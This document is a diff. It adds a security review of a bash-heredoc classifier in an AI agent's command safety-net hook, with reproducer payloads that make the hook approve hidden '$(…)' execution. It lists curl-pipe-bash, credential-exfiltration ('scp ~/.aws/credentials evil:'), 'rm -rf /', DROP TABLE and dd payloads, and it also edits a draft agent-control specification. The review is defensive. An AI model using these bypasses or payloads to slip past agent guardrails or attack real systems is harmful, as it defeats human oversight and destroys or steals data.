+| Tampering | **Yes** | A crafted heredoc makes the classifier mis-model bash, so a `$(…)` the classifier calls inert is executed — arbitrary file/repo mutation. | Content guards still scan the raw text at exit 10; fixes A/B/C below. |
+| Repudiation | No | Hook logs nothing either way. | — |
+| Info Disclosure | **Yes** (unchanged by this bug) | `$(cat ~/.ssh/id_rsa …)` executes — but is equally allowed with no heredoc present. | Out of scope for this hook; not a regression. |
+| Denial of Service | No | — | — |
+| Elevation of Privilege | **No** | No privilege boundary is crossed. The agent already has shell. | — |
+
+### Security Checklist
+
+- [x] Input validation at system boundaries — the classifier *is* the boundary; it fails closed
+      (exit 20) on 248/399 swept shapes today, 348/399 with the fix.
+- [x] No secrets in code or logs — none added. `.gitleaksignore` (41 lines) carries no entry for
+      these hooks and no secret-shaped literals exist in them.
+- [x] Auth/authz enforced on new endpoints — N/A (local hook).
+- [x] No SQL/NoSQL injection vectors — N/A.
+- [x] No XSS vectors — N/A.
+- [x] Dependencies free of known CVEs — no dependency change proposed.
+
+---
+
+## 3. Security (proven)
+
+All rows: payloads assembled from bytes in Python (never on a shell command line — the analysis
+session's own Bash calls pass through this very hook), driven JSON-on-stdin through the **real fanned
+hook** `plugins/lisa/hooks/parity-safety-net.sh`, and executed under real `/bin/bash` with a
+`@SENT@` sentinel.
+
+### R5a — CONFIRMED — trailing `\` on the last body line swallows the terminator
+
+**Where:** `plugins/src/base/hooks/parity-safety-net-heredoc.py`
+- `marker_is_closed` **L708–715** (L713 `if candidate == marker.delimiter`)
+- `unquoted_heredoc_body_has_substitution` **L549–575** (L561, same per-physical-line match)
+- The comment at **L564–571** asserts *"the terminator was matched per physical line above (bash
+  matches the delimiter before continuation processing), so continuations are joined only WITHIN the
+  body window, never across the delimiter."* **That invariant is false for an unquoted delimiter.**
+
+**Bash ground truth measured directly (no parser involved):**
+
+| payload | stdout / stderr | meaning |
+|---|---|---|
+| `cat <<EOF ⏎ foo\ ⏎ EOF ⏎ bar` | stdout `b'fooEOF\nbar\n'` | `\<newline>` joined `foo`+`EOF`; here-doc never terminated; `bar` swallowed as body |
+| `cat <<'EOF' ⏎ foo\ ⏎ EOF ⏎ bar` | stdout `b'foo\\\n'`, stderr `bar: command not found` | backslash is literal data; `EOF` terminates normally |
+
+**So the per-physical-line rule is correct for QUOTED delimiters and wrong only for UNQUOTED ones.**
+That asymmetry is what makes the fix local and provable rather than heuristic.
+
+**Reproducers** (`⏎` = newline, `\` = one backslash):
+
+| id | payload | bash -n | parser | hook | exec |
+|---|---|---|---|---|---|
+| R5a-X1 | `cat <<EOF⏎'foo\⏎EOF⏎$(touch @SENT@)⏎` | PASS | **10** | **ALLOWED(0)** | **True** |
+| R5a-X1w | `cat <<EOF⏎'foo\⏎EOF⏎$(id > @SENT@)⏎` | PASS | **10** | **ALLOWED(0)** | **True** |
+| R5a-bt | ``cat <<EOF⏎'foo\⏎EOF⏎`touch @SENT@`⏎`` | PASS | **10** | **ALLOWED(0)** | **True** |
+
+**Isolating controls (HELD):**
+
+| id | payload | parser | hook |
+|---|---|---|---|
+| C1 (no apostrophe) | `cat <<EOF⏎foo\⏎EOF⏎$(touch)⏎` | 20 | BLOCKED |
+| C3 (balanced apostrophes) | `cat <<EOF⏎'foo'\⏎EOF⏎$(touch)⏎` | 20 | BLOCKED |
+
+**Impact (bounded):** arbitrary `$(…)`/backtick execution in the region bash swallows past the
+apparent terminator, on a Bash tool call the hook approves. Requires a deliberately crafted
+odd-apostrophe body **plus** a trailing backslash on the last body line.
+
+**reason:** reproducer (sentinel created and `id` executed end-to-end through the real hook; C1/C3
+pin the trigger) + bounded impact.
+
+### R5b — CONFIRMED — an odd apostrophe in an unquoted body poisons the flat scanner past the terminator
+
+**Where:**
+- `has_active_command_substitution` **L416–457** runs ONE flat single/double-quote state machine over
+  the whole command, including the here-doc body (L441–443 toggle `single` on `'`).
+- `strip_provably_literal_body` **L694** bails on `not markers[0].quoted`, so an unquoted body is
+  never neutralised.
+- R3's separate body scanner `unquoted_heredoc_body_has_substitution` **L524–575** only walks lines
+  *before* the terminator, so it never sees the post-terminator substitution either.
+
+**Reproducers** (all `bash -n` PASS / parser **10** / hook **ALLOWED(0)** / sentinel **created**):
+
+| id | payload |
+|---|---|
+| R5b-C2min | `cat <<EOF⏎'⏎EOF⏎$(touch @SENT@)⏎` |
+| R5b-real | `cat <<EOF⏎it's fine⏎EOF⏎echo $(touch @SENT@)⏎` ← ordinary agent shape |
+| R5b-full | `cat <<EOF⏎'foo⏎EOF⏎$(touch @SENT@)⏎` |
+| R5b-bt | ``cat <<EOF⏎it's fine⏎EOF⏎`touch @SENT@`⏎`` |
+
+**Poison-family map** (`driver4.py`) — the trigger is *precisely* an odd count of `'` in an unquoted
+body, nothing else:
+
+| body content | current parser |
+|---|---|
+| plain `body` | 20 BLOCKED |
+| even `''` (`it's fine'`) | 20 BLOCKED |
+| odd `"` (`say "hi`) | 20 BLOCKED |
+| `#` alone (`# note`) | 20 BLOCKED |
+| ANSI-C `$'a` | 20 BLOCKED |
+| trailing `\` alone | 20 BLOCKED |
+| **odd `'`** | **10 ALLOWED + EXECUTED** |
+| **odd `'` + `#`** | **10 ALLOWED + EXECUTED** |
+| **three `'`** | **10 ALLOWED + EXECUTED** |
+
+**Scale:** in a 399-shape combinatorial sweep (`driver3.py`: 3 headers × 8 body-poisons × 2 tails ×
+8 payload placements + 15 structural oddities), **114 shapes are ALLOWED-and-EXECUTED on current
+main.** R5a/R5b are a broad family, not two payloads.
+
+**Impact (bounded):** arbitrary `$(…)` on the command line following a `cat <<EOF` file write,
+triggered by an ordinary English apostrophe.
+
+**reason:** reproducer + bounded impact.
+
+### R5c — CONFIRMED — NEW, found during this scoping pass: `<<\EOF` records no Marker
+
+**Where:** `parse_marker` **L578–617**; the documented POSIX-divergence comment at **L597–607** says
+`<<\EOF` is invisible to the parser — *"no Marker is recorded and the body stays raw-visible to every
+guard."* That rationale covers the body's own contents, but **not** the body's ability to corrupt the
+flat scanner's quote state for text *after* the terminator.
+
+**Reproducer:** `cat <<\EOF⏎it's⏎EOF⏎$(touch @SENT@)⏎` → parser **10**, hook **ALLOWED**, sentinel
+**created**. Without the apostrophe the same shape is BLOCKED (20) — pinning the trigger.
+
+**Bash ground truth:** `cat <<\EOF` body is fully literal (`stdout = b"it's $(echo RAN)\n"`), i.e.
+bash/POSIX treat `\EOF` as a **quoted** delimiter. That is what makes the fix principled.
+
+**It survives the R5a+R5b prototype**, because that prototype's neutraliser is gated on
+`len(markers) == 1` and no marker is recorded for this spelling.
+
+**Impact (bounded):** identical to R5b, on a delimiter spelling the parser does not model.
+
+**reason:** reproducer + bounded impact.
+
+## Security (unproven)
+
+- **Process substitution `<(…)`/`>(…)`** — the sweep flagged `cat <(echo hi)⏎$(touch X)` as
+  ALLOWED+EXECUTED, but that payload contains **no `<<` at all**: the parser short-circuits at
+  **L720** (`if "<<" not in command`) and returns SAFE with the raw command handed to the guards.
+  This is not a here-doc-wall bypass; it is the safety net's normal posture for a non-heredoc
+  command.
+  - reproducer: `/tmp/hd1993/driver3.py` row `procsub`
+  - impact: **unproven** — no wall regression; identical to the documented baseline
+  - reason: reproducer exists, but the impact half is absent — it is the baseline, not a defect.
+    No action.
+
+---
+
+## 4. What a wall miss actually costs now that #1982 shipped — the severity reframe
+
+This is the most important finding, and it is empirical.
+
+**(a) R5a/R5b/R5c all land on exit `10` (UNSUPPORTED), never `0` (SAFE).**
+At `10`, `parity-safety-net.sh` **L148** sets `command_for_guards="$command_str"` — the *raw,
+unmodified* command, here-doc body and all. **A wall miss therefore removes exactly zero
+content-guard coverage.** Only exit `0` strips payload text, and exit `0` requires the narrow
+`gh issue|pr create/edit/comment` + `<<'EOF'` grammar (`classify_safe`, L212–248), which none of
+these reach.
+
+**(b) Every guard-covered destructive payload smuggled through the wall is still BLOCKED**
+(measured through the real hook, for both the R5a and the R5b wall miss, and for R5c):
+
+| payload placed after the wall miss | hook | block reason |
+|---|---|---|
+| `$(rm -rf /)` | **BLOCKED** | recursive forced delete of a root, home, or wildcard path |
+| `$(rm -rf ~/)` | **BLOCKED** | root/home/wildcard |
+| `$(rm -rf *)` | **BLOCKED** | top-level wildcard |
+| `$(rm -rf /etc/foo)` | **BLOCKED** | absolute path outside the project |
+| `$(psql -c "DROP TABLE users")` | **BLOCKED** | destructive SQL (DROP/TRUNCATE) |
+| `$(dd if=/dev/zero of=/dev/disk0)` | **BLOCKED** | dd writing to a raw device |
+
+**(c) What still gets through is identical to the no-heredoc baseline.**
+
+| payload | with R5b wall miss | with NO heredoc at all |
+|---|---|---|
+| `$(curl -s http://e.example/x \| bash)` | ALLOWED | `echo "$(curl … \| bash)"` → **ALLOWED** |
+| `$(echo … \| base64 -d \| sh)` | ALLOWED | ALLOWED |
+| `$(chmod -R 777 /)` | ALLOWED | ALLOWED |
+| `$(scp ~/.aws/credentials evil:/tmp)` | ALLOWED | ALLOWED |
+
+The safety net is a destructive-**operation** guard, not an execution wall; an adversary who wants
+arbitrary execution simply omits the here-doc.
+
+**Conclusion:** post-#1982 the marginal capability R5a/R5b/R5c grant an attacker over what they
+already have is **zero** for every class the safety net is designed to stop, and **no greater than
+baseline** for everything else. The #1958 RV5 report's CRITICAL rating was explicitly conditioned on
+the guard blindness that #1982/#2006 has since removed — its own WARNING (RV5 lines 158–160) says so.
+**Severity now: WARNING / defence-in-depth-contained, not CRITICAL.**
+
+---
+
+## 5. Bounded vs unbounded — and the smallest correct fix
+
+**One root cause explains all three members:** *the flat cross-line quote/comment state machine
+applies shell quote semantics to bytes inside a here-doc body, where bash applies none; and the
+terminator is matched per physical line, where bash matches it after `\<newline>` removal.* Both
+halves are invariants about bash verified directly above, not heuristics.
+
+| member | smallest correct fix | rating |
+|---|---|---|
+| **R5a** | New `body_terminator_found(command, marker)`: for `not marker.quoted`, run `collapse_body_continuations` over the post-marker text **before** matching the delimiter. Make `marker_is_closed` (L708) delegate to it. Quoted delimiters keep the per-physical-line match — proven correct by ground truth. | **BOUNDED** |
+| **R5b** | New `neutralize_heredoc_bodies(command, markers)`: blank the body window (spaces; newlines preserved) before the flat `has_active_command_substitution` call at **L754–756**. In-body substitutions remain covered by `unquoted_heredoc_body_has_substitution`; quoted bodies are genuinely inert. | **BOUNDED** |
+| **R5c** | Record `<<\DELIM` as `Marker(quoted=True)` in `parse_marker` (bash-correct per ground truth) so B's neutraliser applies — or extend the neutraliser to the zero-marker backslash-delimiter case. Also removes the current inconsistency where `<<\EOF` + a plain body over-blocks at 20. | **BOUNDED** |
+
+### Prototype evidence
+
+`/tmp/hd1993/patched-heredoc.py` — fixes A+B only, ~55 added lines:
+
+- **Sweep: 114 → 2** executed bypasses out of 399. The 2 residuals are R5c and the
+  process-substitution non-finding.
+- **Full existing suite**, run from a symlink overlay (`/tmp/hd1993/tree`) with the patched parser
+  fanned to all 5 plugin copies:
+  `Test Files 5 passed (5) / Tests 303 passed (303)` — **identical to baseline**
+  (`parity-safety-net-heredoc`, `-literal`, `-continuation`, `-guards`, `parity-safety-net`).
+- **Zero over-block delta:** `OB-apostrophe-prose`, `OB-trailing-bs-mid`, `OB-quoted-literal`,
+  `OB-tabs`, `OB-home-var`, `OB-apos-then-plain-cmd`, `OB-gh-writer` all classify exactly as before.
+- **No regression on prior rounds:** Finding-1, R3-inline, R3-hash, R4-split all still 20/BLOCKED.
+
+### The caveat that must not be lost
+
+R5c — a *new* member of the same class — was found within one session, purely by sweeping. That is
+round 6 of an arms race the owner already hard-bounded at round 5. **Each individual fix is bounded;
+the class is not.**
+
+---
+
+## 6. Recommendations
+
+### FIX NOW — priority: **warning** (not critical)
+
+Apply fixes A + B + C as one change. Justification: each is a provable divergence with a local patch;
+the prototype is empirically clean (303/303, zero over-block, 114→0 in-family); and leaving 114
+sweep-reachable executed bypasses in a shipped guard is poor hygiene even at defence-in-depth
+severity. Do **not** describe the result as "the RCE is fixed."
+
+Mechanics:
+
+- Edit **`plugins/src/base/hooks/parity-safety-net-heredoc.py` only** — the other 4 copies
+  (`plugins/lisa`, `lisa-agy`, `lisa-cursor`, `lisa-copilot`) are generated.
+- In the **same commit**: `bun run build:plugins` (fan-out), `bun run check:plugins` (sync gate), and
+  `bun run build:upstream-evidence-manifest` — CI fails "manifest is stale" without the last one.
+- Fixtures: R5a rows into `tests/unit/hooks/parity-safety-net-heredoc-continuation.test.ts` (its
+  module docstring already owns the continuation story); a new
+  `parity-safety-net-heredoc-body-quote-state.test.ts` for R5b/R5c. Carry the isolating controls
+  C1/C3/C2dq **plus the whole poison-family table from §3** — the "even `''` / odd `\"` / `#` alone
+  do NOT bypass" rows are what pin the root cause and stop a future fix from over-generalising.
+- Re-run all four drivers against the fixed hook before closing; `/tmp/hd1993/driver3.py` is the
+  regression sweep.
+
+Implementation note: the issue's own "Fix direction" §(2) says to map `'`/`"`/`#` to inert bytes
+*while preserving* `$(`/backtick inside the body window. The prototype instead **blanks the window
+entirely** and relies on the existing `unquoted_heredoc_body_has_substitution` (L524–575) for in-body
+detection — simpler, smaller diff, and empirically equivalent (R3-inline, R3-hash, R4-split all stay
+BLOCKED). Either is acceptable.
+
+### HARD STOP — document as accepted limitation
+
+State explicitly that this is the final hardening round and that further members of the class are
+accepted, not tracked. Three homes, each with a distinct reader:
+
+1. **`parity-safety-net-heredoc.py` module docstring (L2).** The authoritative scope statement: this
+   file is a *heuristic re-implementation* of bash's lexer, not an adversary-resistant control; its
+   only hard guarantee is that the SAFE(0) strip path is narrow and provable; **every other path
+   passes the raw command to the content guards**, so a mis-classification degrades to the guards,
+   never to a bypass of them. Name R5a/R5b/R5c and #1993, and record the bash invariants (unquoted
+   body = no quote processing, `\<newline>` removed *before* delimiter match; quoted and
+   `\`-quoted delimiters = fully literal body, backslash is data) so any future round starts from the
+   spec instead of re-deriving it.
+2. **`parity-safety-net.sh` header**, adjacent to the existing "Known accepted false-positive class"
+   paragraph (**L48–57**). Add the symmetric "known accepted *bypass* class" paragraph so an operator
+   reading the hook sees both error directions and the #1982 backstop reasoning.
+3. **`plugins/src/base/skills/lisa-parity-safety-net-rules/SKILL.md`.** It currently has **no**
+   limitations or threat-model section at all (grep for limitation/bypass/threat/adversarial returns
+   1 incidental hit at L190) — an operator reads "Built-in guards (always on)" and reasonably infers
+   a wall. Add a short "What this does and does not defend against": it stops *accidental*
+   catastrophic commands; it does not stop an adversarial agent, which has many uncovered paths
+   regardless of here-docs.
+
+**Not** a `.claude/rules/` entry. Rules are behavioural decrees for agents; this is a capability-scope
+statement about a hook. Hook header + skill is the right home.
+
+### On "document rather than chase"
+
+Both, deliberately. The owner's hard-bound was a decision about *unbounded* chasing and it was right.
+But the work in front of us is not chasing — it is a ~55-line patch already built and proven against
+the full existing suite with zero over-block. Skipping it would leave 114 sweep-reachable executed
+bypasses in place for no engineering saving. What **is** adopted from the owner's framing is the stop
+condition: **after A+B+C ship, this class is closed as an accepted limitation, and the next member
+found is documented, not fixed** — unless someone first demonstrates it defeats the *content guards*,
+which is the layer that actually matters and the one #1982 correctly prioritised.
+
+---
+
+## 7. Issue #1993 body — verbatim
+
+State: OPEN. Labels: none. **Comments: none (0).**
+
+> ## Summary
+>
+> The safety-net heredoc classifier (`parity-safety-net-heredoc.py`) determines whether a heredoc payload is "provably literal" by re-implementing bash's quote/comment/heredoc/continuation lexing in Python. Any divergence between that Python model and real bash's lexing is a bypass: a command substitution the classifier believes is inert but bash actually expands. This is a **systematic class**, not a single bug — five distinct members were found and fixed in #1958 (PR forthcoming), and adversarial review then found two more (R5a, R5b) that remain open. The class is likely not fully closable by heuristic re-implementation.
+>
+> **All members are pre-existing** (present on `main` before #1958) and require **deliberately-crafted** input — none is a shape an agent emits by accident. The safety-net's primary role is catching *accidental* catastrophic commands; robust resistance to an adversary who knows bash's lexer is a different, much harder goal that a PreToolUse regex/heuristic hook cannot fully achieve (an adversarial agent has many other uncovered paths anyway).
+>
+> ## Fixed in #1958 (for reference)
+> - Finding 1 — per-line quote-state reset (this was a regression introduced then reverted).
+> - R1 — ANSI-C `$'…'` quoting desync.
+> - R2 — `str.isspace()` / `str.splitlines()` Unicode-superset desync vs bash's ASCII blanks.
+> - R3 — unquoted-heredoc-body quote/comment desync (a body apostrophe/`#` blinding the scanner).
+> - R4 — line-continuation splitting a substitution token across body lines.
+>
+> ## Open residual (this issue)
+>
+> Two proven bypasses survive at #1958's HEAD, both confirmed executed end-to-end through the real hook under bash:
+>
+> - **R5a** — a trailing backslash on the last body line is a bash continuation that *swallows the terminator*, extending the real body past the line the classifier treats as the delimiter; a substitution placed after the apparent terminator then executes while the classifier scanned a shorter window. R4's window-extraction matches the delimiter per physical line, which is not what bash does when the delimiter line is continued.
+> - **R5b** — an odd single-quote in an unquoted heredoc body opens a phantom quote in the flat substitution scanner that persists *past* the terminator, hiding a command-substitution on a following command line. No backslash needed. (Double-quote variant is already blocked; only the single-quote leak survives.)
+>
+> Both are the "write a note containing an apostrophe via `cat <<EOF`, then one more command" shape.
+>
+> ## Why these were not fixed in-line
+>
+> #1958 was hard-bounded by the repo owner after five fix→re-attack rounds established the class is an open-ended bash-lexer emulation arms race. The decision: ship the five sound, independently-verified fixes (a strict improvement over `main`) and track the residual here rather than continue indefinitely.
+>
+> ## The durable fix is elsewhere
+>
+> These wall bypasses are rated CRITICAL only because the **content guards** (rm/SQL/dd) are themselves blind to a destructive command wrapped in a substitution inside quotes — filed as #1982. If the content guards caught destructive payloads regardless of quoting/substitution, every heredoc-wall miss (including R5a/R5b) would degrade to defense-in-depth rather than an RCE. **#1982 is the higher-leverage fix** and should be prioritized over further heredoc-lexer hardening.
+>
+> ## Fix direction (if the wall itself is hardened later)
+>
+> Make the flat substitution scan heredoc-body-aware with ONE shared cross-line state machine used by both window-extraction and sub-detection: (1) remove `\<newline>` continuations *before* matching the delimiter so a swallowed terminator extends the window (R5a); (2) inside a body window, map `'`/`"`/`#` to inert bytes while preserving `$(`/backtick/`${`/`$((`, so the scanner neither leaks quote state past the terminator nor misses in-body substitutions (R5b). Reproducers and full analysis: `.lisa/security-reverify5-1958.md` in the #1958 branch.
+>
+> ## Non-blocking related residuals
+> - #1982 — content guards miss command substitution nested in double quotes (the reason this class is CRITICAL).
+> - Process-substitution `<(…)`/`>(…)` is not detected by the classifier (independently allowed with no heredoc present; defense-in-depth note).

--- a/spec/tasc-0.1-draft.md
+++ b/spec/tasc-0.1-draft.md
@@ -1,6 +1,6 @@
 # TASC — Trust in Autonomous Software Criteria
 
-**Version:** 0.5.0-draft · **Date:** 2026-07-26 · **Status:** Working draft for circulation
+**Version:** 0.6.0-draft · **Date:** 2026-07-28 · **Status:** Working draft for circulation
 
 **License:** CC BY 4.0 (intended). **Governance:** This document is intended for open,
 vendor-neutral governance (working group or foundation). No conforming tool vendor may
@@ -190,6 +190,10 @@ An attestation MUST include a system description containing, at minimum:
     for each registered loop, deployment target, and Complementary Human
     Control; and, for each person or role holding standing to accept risk
     (AC1.8), the scope of that standing.
+12. **Control register.** The declared control obligations (AC5.8) and their
+    reconciliation status against the running system (AC5.9), including any
+    declared obligation lacking an enforcement point and any enforcement point
+    implementing no declared obligation.
 
 A conforming implementation MAY render the system description live from the system's
 own configuration; a document generated from live state is preferred over prose (P2).
@@ -390,7 +394,9 @@ focus (non-authoritative guidance).
 
 - **AC3.1 Threat model.** The entity MUST maintain a documented threat model for
   the ADS covering, at minimum: prompt injection; instruction-surface trust;
-  dependency hallucination and typosquatting; data exfiltration; persistent-memory
+  dependency hallucination and typosquatting; reproduction of licensed or
+  proprietary material into the entity's own source (SI10); data
+  exfiltration; persistent-memory
   poisoning; sandbox escape and blast radius; and agent misreporting —
   fabricated evidence, self-serving tool or harness selection, unfounded claims
   of blocked access, and self-serving explanations of failure (§7, AC4.6); and
@@ -535,7 +541,8 @@ focus (non-authoritative guidance).
   (e.g., verification-skipping flags) MUST be unavailable to agents or MUST fail
   the change.
 - **AC5.2 Mirror consistency.** Local and agent-layer enforcement MUST be generated
-  from the same source of truth as the authoritative tier, with drift detection.
+  from the same source of truth as the authoritative tier (AC5.8), with drift
+  detection.
 - **AC5.3 Staff parity.** Enforcement MUST be equivalent across every agent in the
   staff roster. Where an agent's harness cannot represent a control, the gap MUST be
   documented and compensated at a shared layer — never silently dropped.
@@ -565,6 +572,51 @@ focus (non-authoritative guidance).
   tolerance is subject to the ratchet (AC5.4). Any advisory control whose
   expected violations over that window exceed its tolerance MUST be promoted to
   an authoritative gate (AC4.5) or have its residual risk formally accepted.
+- **AC5.8 Declared control obligations.** Every control obligation the entity
+  holds itself to MUST exist as a versioned, machine-readable artifact — not
+  only as prose in a policy document, and not only as the incidental
+  configuration of whatever tool happens to enforce it. Each declared obligation
+  MUST state: its identifier; the requirement or criterion it serves; its
+  **enforcement tier** — authoritative or advisory (P4); its enforcement
+  point(s); the **measuring mechanism** that determines whether it is satisfied,
+  together with the basis of that mechanism's independence from the agents whose
+  work it judges (AC4.7); and its current parameter values (thresholds,
+  tolerances, windows). Naming the measuring mechanism is what makes an
+  obligation checkable rather than aspirational: a coverage floor that does not
+  say which system computes coverage has declared an intention, not a control.
+  Enforcement points and agent-facing renderings MUST be **derived** from the
+  declared artifact rather than restated alongside it. An obligation separately
+  transcribed into a pipeline configuration, a lint rule, and an instruction
+  file has three sources of truth and therefore none, and AC5.2's drift
+  detection has nothing to detect against. Declared obligations are part of the
+  agent program (AC8.2) and pass the same change gates as code; parameter
+  changes are subject to the ratchet (AC5.4). A policy that exists only as prose
+  cannot be mirrored into agent context, cannot be diffed, and cannot be shown
+  to have fired.
+- **AC5.9 Control register.** The entity MUST maintain a register of its declared
+  obligations (AC5.8) covering every enforcement point, on every surface and for
+  every agent in the staff roster, and SHOULD render it from live system state
+  rather than maintain it by hand (§6). Each entry MUST carry: the enforcement
+  tier and, per enforcement point, whether it is authoritative; the measuring
+  mechanism; the most recent exercised evidence and its freshness (P1, P2); for
+  advisory controls, measured adherence against the declared tolerance (AC5.7);
+  and the accountable party for the obligation (AC1.7). The advisory inventory
+  AC5.7 requires is the advisory slice of this register, not a second list.
+  The register MUST be **reconciled bidirectionally against the running
+  system**: a declared obligation with no enforcement point, and an enforcement
+  point implementing no declared obligation, are each findings entering intake
+  (AC4.3) — the discipline AC3.1 applies to threats and controls, applied here
+  to obligations and their enforcement. Reconciliation is the criterion's whole
+  substance. An unreconciled register records what an entity believes it
+  enforces, and the distance between that and what it actually enforces is
+  invisible in precisely the direction that matters. The gate inventory (§6)
+  SHOULD be derived from the register, and staff parity (AC5.3) and the
+  unprotected-dimension obligation of P9 are evaluated from it.
+  *Focus: the register answers "what governs this system, where is each
+  obligation enforced, which independent mechanism measures it, who answers for
+  it, and when did it last fire" as a single artifact — the first question an
+  attestor asks, and the one an entity with control configuration scattered
+  across its pipeline cannot answer.*
 
 ### AC6 — Identity, Credentials, and Access *(mirrors CC6, Logical Access)*
 
@@ -743,12 +795,18 @@ focus (non-authoritative guidance).
 - **AC9.1 Model vendors as subservice organizations.** Availability posture, data
   retention, and training-use terms MUST be documented per model vendor; vendor
   outage MUST have a defined operational response (degrade, failover, or halt).
+  Where a vendor offers code-reproduction filtering, attribution facilities, or
+  intellectual-property indemnity, the terms and limits of each MUST be
+  documented; these are subservice controls and are treated under §8 like any
+  other (SI10).
 - **AC9.2 Dependency introduction.** Agents MUST NOT introduce new dependencies
   without a gate: lockfile discipline plus review and/or automated supply-chain
   scanning. The threat model MUST address hallucinated-package squatting and
   typosquatting explicitly.
 - **AC9.3 License compliance.** Dependency licenses MUST be checked against an
-  allowlist as a lifecycle gate.
+  allowlist as a lifecycle gate. This criterion reaches *declared* dependencies
+  only: licensed material reproduced directly into the entity's own source
+  carries no lockfile entry and no SBOM line, and is governed by SI10.
 - **AC9.4 Connector vetting.** Tool connectors (e.g., MCP servers) are executable
   dependencies with tool access: they MUST be pinned, vetted before use, and
   inventoried in the system description.
@@ -823,6 +881,39 @@ focus (non-authoritative guidance).
   reproducer MUST be substituted and the substitution recorded; where no safe
   reproducer exists, the omission MUST be recorded as accepted residual risk
   rather than left implicit.
+- **SI10 Output provenance and licensing.** The entity MUST be able to establish
+  that the code its ADS emits was either authored from the requirement or reused
+  lawfully with every surviving obligation discharged — and MUST NOT rely on
+  review to notice the difference. Changed code MUST pass a lifecycle gate that
+  detects reuse of external material: verbatim or near-verbatim reproduction
+  from public corpora, from repositories and documents fetched into context
+  (AC3.2), and from source belonging to another client, tenant, or engagement.
+  Where a match is identified, the change MUST NOT merge until the source's
+  license is identified and permitted (AC9.3) and every obligation it carries is
+  discharged **mechanically** — notice and attribution retention, license-text
+  inclusion, copyleft assessment — or the code is regenerated. Attribution
+  obligations survive inlining: a permissive license on the allowlist is a
+  permission with conditions, not an absence of conditions, and a notice file
+  assembled by hand is a control nobody has measured.
+  The **permissible-source boundary MUST be declared and mechanically enforced**
+  rather than left to instruction (P4): which repositories, corpora, and
+  engagement contexts an agent may draw from, and which it MUST NOT. The
+  cross-engagement and cross-tenant cases are the ones where the harm is
+  contractual rather than reputational, and persisted memory and learnings
+  (AC3.4, AC4.5) are a carrier for them exactly as context is. Sources admitted
+  to context during authoring MUST be recorded with the change as part of its
+  generation lineage (AC1.2), so a later licensing challenge is answerable from
+  the record instead of reconstructed from the model's behavior.
+  Reproduction of licensed or proprietary material is a threat class under
+  AC3.1; the detection mechanism is a finding source whose false-positive rate
+  MUST be measured (AC4.6), similarity matching being characteristically noisy;
+  and the gate MUST be exercised on a seeded known match (P1, AC5.5). Where the
+  model vendor offers reproduction filtering, attribution facilities, or
+  intellectual-property indemnity, the configuration and limits of each MUST be
+  documented per AC9.1 and MUST NOT be reported as controls the entity operates
+  — a vendor-side filter is a subservice control. Inapplicability is not
+  earnable: every ADS emits code, and an ADS that has never checked holds no
+  evidence rather than a clean record (P2).
 
 ### DP — Data Protection *(supplemental; applies where sensitive or regulated data is in scope — analogous to Confidentiality/Privacy)*
 
@@ -857,12 +948,12 @@ focus (non-authoritative guidance).
 | AC2 Communication & Legibility | CC2 Information & Communication | operator legibility; named run outcomes |
 | AC3 Agent Threat Model | CC3 Risk Assessment | agent-native threat classes; threat-to-control mapping; agent-to-agent boundaries |
 | AC4 Monitoring, Sensors & Finding Integrity | CC4 Monitoring Activities | sensor liveness ≠ findings; finding, measurement, and root-cause integrity; agent-capability drift |
-| AC5 Enforcement Integrity | CC5 Control Activities | server-side authority, parity, ratchet, instruction residual risk, advisory-control adherence |
+| AC5 Enforcement Integrity | CC5 Control Activities | server-side authority, parity, ratchet, instruction residual risk, advisory-control adherence, declared control obligations, the reconciled control register |
 | AC6 Identity & Credentials | CC6 Logical & Physical Access | agent-own identity, gateways, federation |
 | AC7 Operations & Recovery | CC7 System Operations | + autonomy measurement, delivery effectiveness, incident answerability |
 | AC8 Change Management | CC8 Change Management | + the agent program, model and configuration changes, distributional qualification, the evaluation suite, risk tiers, staff introduction, review capacity, observed promotion |
 | AC9 Third Parties & Supply Chain | CC9 Risk Mitigation | model vendors as subservice orgs |
-| SI | Processing Integrity (PI) | mandatory for production software, unlike PI; adds generative testing and defect replay |
+| SI | Processing Integrity (PI) | mandatory for production software, unlike PI; adds generative testing, defect replay, and output provenance |
 | DP | Confidentiality (C) + Privacy (P) | merged; context boundary is the novel control |
 | UX | — (no SOC 2 analog) | condition-scoped |
 | Type I / II | Type I / II | equivalent semantics |
@@ -884,8 +975,12 @@ coverage from its answers.
 
 Criteria are tool-neutral. Illustrative mechanism classes: secret stores and
 credential proxies (AC6); branch/push protection and protected deploy environments
-(AC5.1, AC8.5); artifact signing and immutable evidence stores (§7, AC9.6);
-supply-chain scanners and lockfile gates (AC9.2); mutation testing and defect
+(AC5.1, AC8.5); policy-as-code engines and declarative control definitions that
+generate their own enforcement points and agent-facing renderings (AC5.8);
+live-rendered control registers with enforcement reconciliation (AC5.9);
+artifact signing and immutable evidence stores (§7, AC9.6);
+supply-chain scanners and lockfile gates (AC9.2); code-similarity and snippet-
+provenance scanners with generated attribution notices (SI10); mutation testing and defect
 replay frameworks (SI3); property-based and coverage-guided fuzzing frameworks
 with persistent corpora (SI9); incident and cron-liveness monitors (AC4.2,
 AC7.2); false-positive adjudication queues (AC4.6); billing and telemetry
@@ -922,10 +1017,40 @@ system descriptions; no specific product confers conformance.
 12. Evaluation-suite statement (AC8.7): representativeness review date,
     contamination controls, retired tasks; and the capability-baseline history
     with any detected drift and its attribution (AC4.9)
+13. Control register (AC5.9): declared obligations (AC5.8) with enforcement tier,
+    measuring mechanism and its independence basis, last exercised evidence and
+    freshness, advisory adherence against declared tolerance, and the
+    reconciliation result — obligations without enforcement points, and
+    enforcement points without declared obligations
 
 ---
 
-*End of draft 0.5.0. Changes from 0.4.0, drawn from published accounts of
+*End of draft 0.6.0. Changes from 0.5.0, drawn from practitioner review: the
+specification described at length what controls must do without ever requiring
+an entity to be able to enumerate them. AC5.8 closes the first half — every
+control obligation MUST exist as a versioned, machine-readable artifact naming
+its enforcement tier and the independent mechanism that measures it, with
+enforcement points and agent-facing renderings derived from that artifact rather
+than transcribed beside it. AC5.2 had named a source of truth that nothing
+obliged anyone to have. AC5.9 closes the second half with a control register
+reconciled bidirectionally against the running system, so an obligation with no
+enforcement point and an enforcement point with no obligation are both findings;
+§6 and Annex D carry it as an attestation deliverable. Together they make the
+prior criteria's scattered visibility requirements — the gate inventory, the
+advisory inventory (AC5.7), staff parity (AC5.3), and P9's set of unprotected
+dimensions — readings taken from one artifact instead of four.
+SI10 adds provenance of the ADS's own output. AC9.3 checked the licenses of
+declared dependencies, which reaches nothing a model reproduces directly into
+the entity's source and nothing an agent copies from a repository it fetched
+while researching; the new criterion requires a reuse-detection gate on changed
+code, a declared and mechanically enforced permissible-source boundary covering
